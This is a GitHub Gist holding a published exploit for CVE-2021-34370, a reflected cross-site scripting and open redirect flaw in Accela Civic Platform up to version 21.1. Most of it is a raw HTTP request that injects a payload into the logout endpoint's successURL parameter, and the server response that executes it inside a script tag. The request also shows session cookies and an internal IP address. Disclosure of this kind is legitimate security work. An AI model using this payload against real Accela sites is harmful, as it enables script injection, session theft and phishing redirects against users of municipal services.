Last active
June 10, 2021 10:35
-
-
Save 0xx7/7e9f1b725f7ff98b9239d3cb027b7dc8 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 | |
| # Date: June/9/2021 | |
| # Exploit Author: Abdul Azeez Alaseeri | |
| # Author page: https://www.linkedin.com/in/0xx777/ | |
| # Vendor Homepage: https://www.accela.com/civic-platform/ | |
| # CVE-2021-34370 | |
| ================================================================ | |
| Accela Civic Platform Cross-Site-Scripting <= 21.1 | |
| ================================================================ | |
| ================================================================ | |
| Request Heeaders start | |
| ================================================================ | |
| GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1 | |
| Host: Hidden | |
| Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Upgrade-Insecure-Requests: 1 | |
| Te: trailers | |
| Connection: close | |
| ================================================================ | |
| Request Heeaders end | |
| ================================================================ | |
| ================================================================ | |
| Response Heeaders start | |
| ================================================================ | |
| HTTP/1.1 200 OK | |
| Connection: close | |
| Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter | |
| X-XSS-Protection: 0 | |
| Content-Type: text/html;charset=ISO-8859-1 | |
| Content-Length: 73 | |
| Date: Tue, 08 Jun 2021 10:41:59 GMT | |
| <script type='text/javascript'>document.location=''^alert`1`^''</script> | |
| ================================================================ | |
| Response Heeaders end | |
| ================================================================ | |
| Payload: %27^alert`1`^%27 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment